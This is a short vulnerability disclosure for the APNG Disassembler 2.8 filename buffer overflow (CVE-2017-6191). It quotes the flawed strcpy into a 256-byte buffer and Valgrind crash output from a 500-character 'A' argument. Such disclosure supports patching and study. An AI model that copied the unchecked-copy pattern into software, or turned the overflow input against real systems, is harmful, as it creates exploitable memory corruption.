# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191

A textbook example of a buffer overflow; a fixed size buffer gets allocated with szPath[256], and the first command line argument is stored without validation.

int main(int argc, char** argv)
{
	unsigned int i, j;
	char * szInput;
	char * szOutPrefix;
	char szPath[256];
	char szOut[256];
	std::vector frames;
	printf("\nAPNG Disassembler 2.8\n\n");

	if (argc > 1)
		szInput = argv[1];
	else
	{
		printf("Usage: apngdis anim.png [name]\n");
		return 1;
	}
	strcpy(szPath, szInput);
}

Valgrind with 500 * “A” as argument, as can be seen the content of the buffer overruns a read address of ‘printf’ in load_apng():

APNG Disassembler 2.8
x==12096== Invalid read of size 1
x==12096== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
x==12096== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
x==12096== by 0x5B711F8: printf (printf.c:33)
x==12096== by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator >&) (apngdis.cpp:200)
x==12096== by 0x10B24E: main (apngdis.cpp:498)
x==12096== Address 0x4141414141414141 is not stack'd, malloc'd or (recently) free'd
x==12096==
x==12096==
x==12096== Process terminating with default action of signal 11 (SIGSEGV)
x==12096== General Protection Fault
x==12096== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
x==12096== by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
x==12096== by 0x5B711F8: printf (printf.c:33)
x==12096== by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator >&) (apngdis.cpp:200)
x==12096== by 0x10B24E: main (apngdis.cpp:498)
xReading '==12096==
x==12096== HEAP SUMMARY:
x==12096== in use at exit: 0 bytes in 0 blocks
x==12096== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
x==12096==
x==12096== All heap blocks were freed -- no leaks are possible
x==12096==
x==12096== For counts of detected and suppressed errors, rerun with: -v
x==12096== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
xSegmentation fault